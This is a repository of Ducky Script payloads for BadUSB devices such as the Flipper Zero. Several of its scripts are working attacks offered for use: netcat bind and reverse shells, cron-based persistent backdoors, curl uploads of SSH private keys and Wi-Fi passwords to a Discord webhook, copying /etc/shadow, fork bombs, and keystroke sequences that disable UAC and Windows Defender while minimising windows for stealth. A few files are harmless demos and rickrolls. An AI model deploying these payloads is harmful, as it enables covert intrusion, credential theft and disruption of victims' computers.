├── README.md
├── linux
│   ├── bindshell.txt
│   ├── demo.txt
│   ├── forkbomb.txt
│   ├── id-rsa_discord.txt
│   ├── persistent_bindshell.txt
│   ├── persistent_http2.txt
│   ├── persistent_http3.txt
│   ├── persistent_revshell.txt
│   ├── revshell.txt
│   ├── rickroll.txt
│   └── wifi_discord.txt
├── macos_demo.txt
├── test_linux_dumpcreds.txt
├── test_macos_forkbomb.txt
├── test_macos_rickroll.txt
├── test_windows_dumpcreds.txt
├── test_windows_forkbomb.txt
└── windows
    ├── demo.txt
    ├── disable_UAC.txt
    ├── disable_defender.txt
    └── rickroll.txt

/README.md:
--------------------------------------------------------------------------------
# Ducky Script Payloads
This is a collection of scripts that I have written in Ducky Script to be used in bad USBs.

## How is this organised?
Currently scripts are sorted by the target platform, so scripts to work on Windows computers are in the windows dir, Linux in the linux dir, etc.

## What do these do?
It depends on the script. I have tried to give these self-explanatory names, but there are also comments in the code to explain what each script does and what it's doing.

## How can I use these?
These scripts can be used on either the [USB Rubber Ducky](https://hak5.org/products/usb-rubber-ducky) or the [Flipper Zero](https://flipperzero.one/). For more detailed documentation, refer to the docs of each of these products. I will warn you that this repo was created with the Flipper Zero in mind (personally I just have this folder in my /badusb/ folder of the Flipper; I think the folder structure is good for organisation), but it should work when compiled for the Ducky.

## How can I get help?
14 | If any help is needed, feel free to either open up an issue or reach out to me on [Twitter](https://twitter.com/UndedInside) 15 | -------------------------------------------------------------------------------- /linux/bindshell.txt: -------------------------------------------------------------------------------- 1 | REM Title: Netcat Bind Shell 2 | REM Author: UndedInside 3 | REM Description: Start a bind shell 4 | 5 | REM Open new terminal window 6 | DEFAULT_DELAY 400 7 | ALT t 8 | DELAY 1000 9 | 10 | REM Start bind shell 11 | REM The port can be changed if required 12 | STRINGLN nc -l -p 1234 -e /bin/bash 13 | 14 | REM Minimise window to run stealthily 15 | ALT F9 16 | -------------------------------------------------------------------------------- /linux/demo.txt: -------------------------------------------------------------------------------- 1 | REM This is BadUSB demo script for linux 2 | 3 | REM Open terminal window 4 | DELAY 1000 5 | ALT T 6 | DELAY 1000 7 | STRING cd ~ 8 | ENTER 9 | DELAY 500 10 | STRING nano flipperzero.txt 11 | ENTER 12 | 13 | STRING Hello World! 14 | ENTER 15 | 16 | DEFAULT_DELAY 50 17 | 18 | STRING = 19 | REPEAT 59 20 | ENTER 21 | ENTER 22 | 23 | STRING _.-------.._ -, 24 | ENTER 25 | HOME 26 | STRING .-"```"--..,,_/ /`-, -, \ 27 | ENTER 28 | HOME 29 | STRING .:" /:/ /'\ \ ,_..., `. 
| | 30 | ENTER 31 | HOME 32 | STRING / ,----/:/ /`\ _\~`_-"` _; 33 | ENTER 34 | HOME 35 | STRING ' / /`"""'\ \ \.~`_-' ,-"'/ 36 | ENTER 37 | HOME 38 | STRING | | | 0 | | .-' ,/` / 39 | ENTER 40 | HOME 41 | STRING | ,..\ \ ,.-"` ,/` / 42 | ENTER 43 | HOME 44 | STRING ; : `/`""\` ,/--==,/-----, 45 | ENTER 46 | HOME 47 | STRING | `-...| -.___-Z:_______J...---; 48 | ENTER 49 | HOME 50 | STRING : ` _-' 51 | ENTER 52 | HOME 53 | STRING _L_ _ ___ ___ ___ ___ ____--"` 54 | ENTER 55 | HOME 56 | STRING | __|| | |_ _|| _ \| _ \| __|| _ \ 57 | ENTER 58 | HOME 59 | STRING | _| | |__ | | | _/| _/| _| | / 60 | ENTER 61 | HOME 62 | STRING |_| |____||___||_| |_| |___||_|_\ 63 | ENTER 64 | HOME 65 | ENTER 66 | 67 | STRING Flipper Zero BadUSB feature is compatible with USB Rubber Ducky script format 68 | ENTER 69 | STRING More information about script syntax can be found here: 70 | ENTER 71 | STRING https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript 72 | ENTER 73 | 74 | CONTROL X 75 | STRING y 76 | ENTER 77 | 78 | DELAY 500 79 | STRING cat flipperzero.txt 80 | ENTER 81 | -------------------------------------------------------------------------------- /linux/forkbomb.txt: -------------------------------------------------------------------------------- 1 | REM Title: Fork Bomb 2 | REM Author: UndedInside 3 | REM Description: Function that recursively runs itself, consuming resources 4 | REM This (probably) doesn't do any lasting damage. Should be fine after reboot. 
5 | 6 | REM Open terminal 7 | DEFAULT_DELAY 700 8 | ALT T 9 | 10 | REM: Create/run forkbomb 11 | STRINGLN :(){ :|:& };: 12 | -------------------------------------------------------------------------------- /linux/id-rsa_discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: ID-RSA Discord Exfil 2 | REM Author: UndedInside 3 | REM Description: Exfils id-rsa over Discord 4 | 5 | REM Open terminal: 6 | DEFAULT_DELAY 400 7 | ALT t 8 | DELAY 500 9 | STRINGLN cd ~/.ssh 10 | 11 | REM Enumerate info and exfil private SSH key 12 | STRINGLN info=`whoami`@`hostname` 13 | STRINGLN curl -F 'payload_json={"username": "'"$info"'", "content": "SSH Key:"}' -F "file1=@id_rsa" "[WEBHOOK URL]" 14 | 15 | REM Cleanup: 16 | DELAY 500 17 | ALT F4 18 | -------------------------------------------------------------------------------- /linux/persistent_bindshell.txt: -------------------------------------------------------------------------------- 1 | REM Title: Persistent Bind Shell 2 | REM Author: UndedInside 3 | REM Description: Creates a cronjob that starts a bind shell 4 | 5 | REM Open terminal 6 | DEFAULT_DELAY 700 7 | ALT t 8 | 9 | REM Create cronjob to start listening on port 1234 10 | REM The attacker IP will need to be set below 11 | STRINGLN echo "* * * * * nc -l -p 1234 -e /bin/bash" > cron 12 | STRINGLN crontab -i cron 13 | 14 | REM Since the job has now been started we can close the window 15 | STRINGLN rm cron 16 | ALT F4 17 | -------------------------------------------------------------------------------- /linux/persistent_http2.txt: -------------------------------------------------------------------------------- 1 | REM Title: Persistent HTTP Backdoor (Python2) 2 | REM Author: UndedInside 3 | REM Description: Hosts the victim's filetree on an HTTP server using the builtin Python2 module 4 | 5 | REM Open new terminal window 6 | DEFAULT_DELAY 400 7 | ALT t 8 | 9 | REM Create backdoor 10 | STRINGLN echo "* * * * * cd ~ && 
python2 -m SimpleHTTPServer 8000" > cron 11 | STRINGLN crontab -i cron 12 | 13 | REM Clean up 14 | STRINGLN rm cron 15 | ALT F4 16 | 17 | REM You can now interact with this by navigating to http://[Victim IP]:8000 in a browser 18 | REM or curl [Victim IP]:8000 19 | -------------------------------------------------------------------------------- /linux/persistent_http3.txt: -------------------------------------------------------------------------------- 1 | REM Title: Persistent HTTP Backdoor (Python3) 2 | REM Author: UndedInside 3 | REM Description: Hosts the victim's filetree on an HTTP server using the builtin Python3 module 4 | 5 | REM Open new terminal window 6 | DEFAULT_DELAY 400 7 | ALT t 8 | 9 | REM Create backdoor 10 | STRINGLN echo "* * * * * cd ~ && python3 -m http.server 8080" > cron 11 | STRINGLN crontab -i cron 12 | 13 | REM Clean up 14 | STRINGLN rm cron 15 | REM ALT F4 16 | 17 | REM You can now interact with this by navigating to http://[Victim IP]:8080 in a browser 18 | REM or curl [Victim IP]:8080 19 | -------------------------------------------------------------------------------- /linux/persistent_revshell.txt: -------------------------------------------------------------------------------- 1 | REM Title: Persistent Reverse Shell 2 | REM Author: UndedInside 3 | REM Description: Creates a cronjob that starts a reverse shell 4 | 5 | REM Open terminal 6 | DEFAULT_DELAY 700 7 | ALT t 8 | 9 | REM Create cronjob to connect to attacker on port 1234 10 | REM The attacker IP will need to be set below 11 | STRINGLN echo "* * * * * /bin/bash -c 'bash -i>& /dev/tcp/[IP]/1234 0>&1'" > cron 12 | STRINGLN crontab -i cron 13 | 14 | REM Since the job has been created, we can close the window 15 | ALT F4 16 | -------------------------------------------------------------------------------- /linux/revshell.txt: -------------------------------------------------------------------------------- 1 | REM Title: Netcat Reverse Shell 2 | REM Author: UndedInside 3 | REM 
Description: Opens a reverse shell to the attackers IP 4 | 5 | REM Open terminal window 6 | DEFAULT_DELAY 400 7 | ALT t 8 | DELAY 1000 9 | 10 | REM Start reverse shell 11 | REM [IP] will need to be replaced with attacker IP 12 | STRINGLN nc [IP] 1234 -e /bin/bash 13 | 14 | REM Minimise window to run stealthily 15 | ALT F9 16 | -------------------------------------------------------------------------------- /linux/rickroll.txt: -------------------------------------------------------------------------------- 1 | REM Title: Linux Rickroll 2 | REM Author: UndedInside 3 | REM Description: The iconic rick roll 4 | REM Uses the 10 hour version for maximum annoyance 5 | 6 | 7 | DEFAULT_DELAY 700 8 | REM Open video: 9 | ALT T 10 | STRINGLN xdg-open https://vimeo.com/375468729 11 | 12 | REM Fullscren video: 13 | DELAY 5000 14 | STRING f 15 | -------------------------------------------------------------------------------- /linux/wifi_discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: WiFi Discord Exfil 2 | REM Author: UndedInside 3 | REM Description: Dumps WiFi creds and sends them via discord webhook 4 | 5 | REM SETUP: 6 | REM In your discord server, open server settings, go to "Integrations > Webhooks" and create a new one 7 | REM Press the 'Copy Webhook URL' button and replace [WEBHOOK] in the below script. 
8 | 9 | REM Open terminal: 10 | DEFAULT_DELAY 400 11 | ALT t 12 | DELAY 500 13 | STRINGLN cd /tmp 14 | 15 | REM Dump WiFi creds to file and enumerate hostname: 16 | STRINGLN nmcli device wifi show-password > creds.txt 17 | STRINGLN info=`whoami`@`hostname` 18 | 19 | REM Send file: 20 | STRINGLN curl -F 'payload_json={"username": "'"$info"'", "content": "WiFi creds:"}' -F "file1=@creds.txt" "[WEBHOOK URL]" 21 | DELAY 700 22 | 23 | REM Cleanup: 24 | STRINGLN rm creds.txt 25 | ALT F4 26 | -------------------------------------------------------------------------------- /macos_demo.txt: -------------------------------------------------------------------------------- 1 | ID 1234:5678 Apple:Keyboard 2 | REM You can change these values to VID/PID of original Apple keyboard 3 | REM to bypass Keyboard Setup Assistant 4 | 5 | REM This is BadUSB demo script for macOS 6 | 7 | REM Open terminal window 8 | DELAY 1000 9 | GUI SPACE 10 | DELAY 500 11 | STRING terminal 12 | DELAY 500 13 | ENTER 14 | DELAY 750 15 | 16 | REM Copy-Paste previous string 17 | UP 18 | CTRL c 19 | 20 | REM Bigger shell script example 21 | STRING cat > /dev/null << EOF 22 | ENTER 23 | 24 | STRING Hello World! 25 | ENTER 26 | 27 | DEFAULT_DELAY 50 28 | 29 | STRING = 30 | REPEAT 59 31 | ENTER 32 | ENTER 33 | 34 | STRING _.-------.._ -, 35 | ENTER 36 | HOME 37 | STRING .-"```"--..,,_/ /`-, -, \ 38 | ENTER 39 | HOME 40 | STRING .:" /:/ /'\ \ ,_..., `. 
| | 41 | ENTER 42 | HOME 43 | STRING / ,----/:/ /`\ _\~`_-"` _; 44 | ENTER 45 | HOME 46 | STRING ' / /`"""'\ \ \.~`_-' ,-"'/ 47 | ENTER 48 | HOME 49 | STRING | | | 0 | | .-' ,/` / 50 | ENTER 51 | HOME 52 | STRING | ,..\ \ ,.-"` ,/` / 53 | ENTER 54 | HOME 55 | STRING ; : `/`""\` ,/--==,/-----, 56 | ENTER 57 | HOME 58 | STRING | `-...| -.___-Z:_______J...---; 59 | ENTER 60 | HOME 61 | STRING : ` _-' 62 | ENTER 63 | HOME 64 | STRING _L_ _ ___ ___ ___ ___ ____--"` 65 | ENTER 66 | HOME 67 | STRING | __|| | |_ _|| _ \| _ \| __|| _ \ 68 | ENTER 69 | HOME 70 | STRING | _| | |__ | | | _/| _/| _| | / 71 | ENTER 72 | HOME 73 | STRING |_| |____||___||_| |_| |___||_|_\ 74 | ENTER 75 | HOME 76 | ENTER 77 | 78 | STRING Flipper Zero BadUSB feature is compatible with USB Rubber Ducky script format 79 | ENTER 80 | STRING More information about script syntax can be found here: 81 | ENTER 82 | STRING https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript 83 | ENTER 84 | 85 | STRING EOF 86 | ENTER 87 | -------------------------------------------------------------------------------- /test_linux_dumpcreds.txt: -------------------------------------------------------------------------------- 1 | REM Dumps network credentials and exfils them 2 | DEFAULT_DELAy 400 3 | CTRL ALT t 4 | STRING cp /etc/shadow /tmp/creds.txt 5 | REM To Do: Exfil creds 6 | REM - AWS instance 7 | REM - DropBox 8 | REM - Email 9 | REM - IRC -------------------------------------------------------------------------------- /test_macos_forkbomb.txt: -------------------------------------------------------------------------------- 1 | REM Forkbomb to crash MacOS machines 2 | DEFAULT_DELAY 500 3 | GUI SPACE 4 | STRING terminal 5 | ENTER 6 | perl -e "fork while fork" & -------------------------------------------------------------------------------- /test_macos_rickroll.txt: -------------------------------------------------------------------------------- 1 | REM The classic rick roll 2 | DEFAULT_DELAY 500 3 | REM 
Open video: 4 | GUI SPACE 5 | STRING terminal 6 | ENTER 7 | STRING open https://vimeo.com/375468729 8 | ENTER 9 | DELAY 700 10 | STRING f 11 | SPACE -------------------------------------------------------------------------------- /test_windows_dumpcreds.txt: -------------------------------------------------------------------------------- 1 | REM Dumps Windows credentials via MimiKatz 2 | DEFAULT_DELAY 400 3 | REM Open powershell 4 | CTRL ESC 5 | STRING powershell 6 | ENTER 7 | REM Download MimiKatz (using ULC to test) 8 | STRING Invoke-WebRequest -Uri 'https://github.com/UndedInside/ULC/ulc.cpp -OutFile $env:TEMP 9 | -------------------------------------------------------------------------------- /test_windows_forkbomb.txt: -------------------------------------------------------------------------------- 1 | REM Forkbomb to crash Windows machines 2 | DEFAULT_DELAY 500 3 | CTRL ESC 4 | STRING cmd 5 | ENTER 6 | STRING %0|%0 7 | REM Test this ^ 8 | ENTER -------------------------------------------------------------------------------- /windows/demo.txt: -------------------------------------------------------------------------------- 1 | REM This is BadUSB demo script for windows 2 | 3 | REM Open windows notepad 4 | DELAY 1000 5 | GUI r 6 | DELAY 500 7 | STRING notepad 8 | DELAY 500 9 | ENTER 10 | DELAY 750 11 | 12 | STRING Hello World! 13 | ENTER 14 | DEFAULT_DELAY 50 15 | 16 | REM Copy-Paste previous string 17 | UP 18 | HOME 19 | SHIFT DOWN 20 | CTRL c 21 | RIGHT 22 | CTRL v 23 | CTRL v 24 | 25 | REM Alt code input demo 26 | ALTCHAR 7 27 | ALTSTRING This line was print using Alt+Numpad input method. It works even if non-US keyboard layout is selected 28 | ENTER 29 | 30 | STRING = 31 | REPEAT 59 32 | ENTER 33 | ENTER 34 | 35 | STRING _.-------.._ -, 36 | ENTER 37 | HOME 38 | STRING .-"```"--..,,_/ /`-, -, \ 39 | ENTER 40 | HOME 41 | STRING .:" /:/ /'\ \ ,_..., `. 
| | 42 | ENTER 43 | HOME 44 | STRING / ,----/:/ /`\ _\~`_-"` _; 45 | ENTER 46 | HOME 47 | STRING ' / /`"""'\ \ \.~`_-' ,-"'/ 48 | ENTER 49 | HOME 50 | STRING | | | 0 | | .-' ,/` / 51 | ENTER 52 | HOME 53 | STRING | ,..\ \ ,.-"` ,/` / 54 | ENTER 55 | HOME 56 | STRING ; : `/`""\` ,/--==,/-----, 57 | ENTER 58 | HOME 59 | STRING | `-...| -.___-Z:_______J...---; 60 | ENTER 61 | HOME 62 | STRING : ` _-' 63 | ENTER 64 | HOME 65 | STRING _L_ _ ___ ___ ___ ___ ____--"` 66 | ENTER 67 | HOME 68 | STRING | __|| | |_ _|| _ \| _ \| __|| _ \ 69 | ENTER 70 | HOME 71 | STRING | _| | |__ | | | _/| _/| _| | / 72 | ENTER 73 | HOME 74 | STRING |_| |____||___||_| |_| |___||_|_\ 75 | ENTER 76 | HOME 77 | ENTER 78 | 79 | STRING Flipper Zero BadUSB feature is compatible with USB Rubber Ducky script format 80 | ENTER 81 | STRING More information about script synax can be found here: 82 | ENTER 83 | STRING https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript 84 | ENTER 85 | -------------------------------------------------------------------------------- /windows/disable_UAC.txt: -------------------------------------------------------------------------------- 1 | REM Disables User Account Control 2 | DEFAULT_DELAY 400 3 | REM Open UAC 4 | CTRL ESC 5 | STRING UAC 6 | ENTER 7 | LEFTARROW 8 | ENTER 9 | REM Disable UAC 10 | TAB 11 | DOWNARROW 12 | DOWNARROW 13 | DOWNARROW 14 | TAB 15 | ENTER 16 | LEFTARROW 17 | ENTER 18 | -------------------------------------------------------------------------------- /windows/disable_defender.txt: -------------------------------------------------------------------------------- 1 | REM Disables Windows Defender 2 | REM Open Defender settings 3 | DEFAULT_DELAY 400 4 | CTRL ESC 5 | STRING defender 6 | ENTER 7 | ENTER 8 | TAB 9 | TAB 10 | TAB 11 | TAB 12 | ENTER 13 | REM Disable protection 14 | SPACE 15 | TAB 16 | TAB 17 | TAB 18 | TAB 19 | SPACE 20 | REM Clean up 21 | ALT F4 22 | 
-------------------------------------------------------------------------------- /windows/rickroll.txt: -------------------------------------------------------------------------------- 1 | REM The classic rick roll 2 | DEFAULT_DELAY 700 3 | REM Open video: 4 | CTRL ESC 5 | STRING cmd 6 | ENTER 7 | STRING start msedge https://vimeo.com/375468729 8 | ENTER 9 | REM Fullscreen video: 10 | DELAY 1000 11 | STRING f 12 | SPACE 13 | --------------------------------------------------------------------------------
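
For defenders who recover a Ducky Script file from a suspicious USB device, the script format used throughout this repository can be triaged statically. The following is an added example, not code from this repository: it rebuilds the text a script would type and flags command patterns of the kinds seen in the scripts above. The names `typed_lines`, `triage` and `INDICATORS` are hypothetical, the pattern list is an assumption to be tuned, and `REPEAT` is not expanded.

```python
import re

# Indicator patterns modelled on the kinds of commands the scripts on this
# page type (assumed starting set; extend for your environment).
INDICATORS = {
    "shell-on-socket": re.compile(r"\bnc\b.*\s-e\s|/dev/tcp/"),
    "cron-persistence": re.compile(r"\bcrontab\b"),
    "file-upload": re.compile(r"\bcurl\b.*\s-F\s"),
    "http-file-server": re.compile(r"SimpleHTTPServer|http\.server"),
    "credential-file": re.compile(r"id_rsa|/etc/shadow|show-password"),
}

def typed_lines(script: str) -> list[str]:
    """Reconstruct the text a script types, one entry per submitted line."""
    out, buf = [], ""
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.upper().startswith("REM"):
            continue  # blank lines and comments type nothing
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd in ("STRING", "ALTSTRING"):
            buf += arg  # typed, but not submitted until ENTER
        elif cmd == "STRINGLN":
            out.append(buf + arg)  # typed and submitted in one step
            buf = ""
        elif cmd == "ENTER":
            if buf:
                out.append(buf)
            buf = ""
        # Delays, REPEAT and hot-key lines (ALT t, GUI r, ...) type no text.
    if buf:
        out.append(buf)  # text typed but never submitted
    return out

def triage(script: str) -> list[tuple[str, str]]:
    """Return (indicator name, typed command) pairs for an analyst to review."""
    hits = []
    for text in typed_lines(script):
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.append((name, text))
    return hits

# Constructed sample in the style of the persistence scripts on this page.
SAMPLE = """\
REM Constructed sample for triage
DEFAULT_DELAY 400
ALT t
STRINGLN echo "* * * * * cd ~ && python3 -m http.server 8080" > cron
STRINGLN crontab -i cron
STRING rm cron
ENTER
ALT F4
"""

if __name__ == "__main__":
    for name, text in triage(SAMPLE):
        print(f"{name}: {text}")
```

The same indicator names map directly onto host-side checks: unexpected per-user crontab entries, listeners on unprivileged ports, and outbound multipart uploads from a terminal session.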